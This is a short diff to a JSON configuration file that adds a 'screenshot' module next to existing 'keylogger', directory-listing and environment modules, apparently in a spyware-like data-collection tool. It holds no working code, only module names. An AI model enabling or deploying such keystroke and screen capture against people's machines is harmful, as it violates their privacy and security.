--- a/config/config.json
+++ b/config/config.json
@@ -1,5 +1,6 @@
 [
     {"module": "dirlijster"},
     {"module": "omgeving"},
-    {"module": "keylogger"}
+    {"module": "keylogger"},
+    {"module": "screenshot"}
 ]
